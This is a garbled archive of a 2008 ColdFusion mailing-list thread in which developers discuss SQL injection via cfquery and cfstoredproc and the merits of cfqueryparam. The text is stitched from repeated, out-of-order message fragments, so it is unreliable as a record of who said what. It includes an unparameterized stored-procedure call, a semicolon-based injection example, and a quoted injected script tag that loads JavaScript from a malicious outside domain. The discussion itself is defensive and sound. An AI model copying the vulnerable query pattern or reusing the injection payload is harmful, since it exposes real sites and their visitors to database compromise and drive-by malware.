Actually, I'm gonna pick on you again Dave and challenge
this. (I'm hoping to add to my wall)
If a someone is using MySQL ...
Well, the original poster was asking about the current attack, which
specifically targets MS SQL Server.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Do you mind if I blog about that part where you said Yeah,
your right about that That's got to be good for my
cf_streetCred (ha).
I don't mind, no.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction
Actually, I'm gonna pick on you again Dave and challenge
this. (I'm hoping to add to my wall)
If a someone is using MySQL ...
Well, the original poster was asking about the current attack, which
specifically targets MS SQL Server.
That might be true, but he didn't say that. He simply
Yes you are vulnerable if you do not sanitize the inputs.
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
-Original Message-
From: Tim Do [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 2:28 PM
To: CF-Talk
Subject:
As you have heard, cfquery is vulnerable to sql injection attacks, so
you have to do something.
You will hear that cfqueryparam is the best practice for protecting
against sql injection attacks, and there is certainly truth to that.
However, there are also costs associated with cfqueryparam.
(Depending
on the version of CF, cfqueryparam disables cachedwithin caching.
This is true, but it doesn't prevent you from baking your own caching
mechanism as many have done.
In
all versions of CF, cfqueryparam effectively makes Sql Profiling with
SQL Server useless and there is no
]
Sent: Tuesday, July 22, 2008 3:46 PM
To: CF-Talk
Subject: Re: cfquery and cfstoredproc
(Depending
on the version of CF, cfqueryparam disables cachedwithin caching.
This is true, but it doesn't prevent you from baking your own caching
mechanism as many have done.
In
all versions of CF
Subject: Re: cfquery and cfstoredproc
In all versions of CF, cfqueryparam effectively makes Sql Profiling with
SQL Server useless and there is no workaround.
Please explain what you mean. Are you saying you can't run a trace and see
your SQL running. That is certainly not true. It may complicate
ticks are insufficient, so now I
know.)
Thanks for the info.
Mark
-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 4:46 PM
To: CF-Talk
Subject: Re: cfquery and cfstoredproc
(Depending
on the version of CF, cfqueryparam disables
Thanks Adrian. That's cool. however, it is not useful DURING the execution
of the SQL though correct?
~Brad
- Original Message -
From: Adrian Lynch [EMAIL PROTECTED]
To: CF-Talk cf-talk@houseoffusion.com
Sent: Tuesday, July 22, 2008 3:51 PM
Subject: RE: cfquery and cfstoredproc
-
From: Gaulin, Mark [EMAIL PROTECTED]
To: CF-Talk cf-talk@houseoffusion.com
Sent: Tuesday, July 22, 2008 4:34 PM
Subject: RE: cfquery and cfstoredproc
Hi Brad
Thanks for the links, those are interesting articles.
~|
Adobe
i have been asked to look at a possible sql injection attack.
as I look through the code I see stored procs being called
by using cfquery like:
cfquery name=asdf datasource=asdf
storedproc '#var1#', '#var2#'
cfquery
I've read about using cfstored procs and params
[mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 5:50 PM
To: CF-Talk
Subject: RE: cfquery and cfstoredproc
i have been asked to look at a possible sql injection attack.
as I look through the code I see stored procs being called by using
cfquery like:
cfquery name=asdf datasource
What about a semi-colon?
Storedproc '#var1#','#var2#' ; *other code*
Would the CFQUERY not allow this additional code to run?
It wouldn't allow any of the values after the stored procedure call
storedproc to run as code, because they would be placed in the input
parameters of the stored
Subject: RE: cfquery and cfstoredproc
Dave,
What about a semi-colon?
Storedproc '#var1#','#var2#' ; *other code*
Would the CFQUERY not allow this additional code to run?
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
So I'm hearing that it should be fine??
Somehow their database columns values were appended the
following string
: /titleInvalidTag src=http://1.verynx.cn/w.js;/script!--
So for example the column firstname value was John became:
John/titleInvalidTag
www.necfug.com
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 6:07 PM
To: CF-Talk
Subject: RE: cfquery and cfstoredproc
What about a semi-colon?
Storedproc '#var1#','#var2#' ; *other code*
Would the CFQUERY not allow this additional code to run
I never disagree with you (usually a fools errand)
Ha! I wish.
but I want a clarification. I think you might mean that this
particular use is safe because CF will escape the single quotes.
But the code below is vulnerable in exactly the same as a CFQUERY.
As a test I created an SP
So I'm hearing that it should be fine??
Somehow their database columns values were appended the following
string
: /titleInvalidTag src=http://1.verynx.cn/w.js;/script!--
So for example the column firstname value was John became:
John/titleInvalidTag
Dave,
Do you mind if I blog about that part where you said Yeah, your right about
that That's got to be good for my cf_streetCred (ha).
-mk
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 7:14 PM
To: CF-Talk
Subject: RE: cfquery
, 2008 8:58 PM
Subject: RE: cfquery and cfstoredproc
Dave,
Do you mind if I blog about that part where you said Yeah, your right
about
that That's got to be good for my cf_streetCred (ha).
-mk
~|
AdobeĀ® ColdFusion
As Mark pointed out, if you did have numeric inputs in your CFQUERY tag,
those would still be vulnerable. If not, though, the rest of my statement
still stands.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Actually, I'm gonna pick on you again Dave and challenge this. (I'm
22 matches
Mail list logo
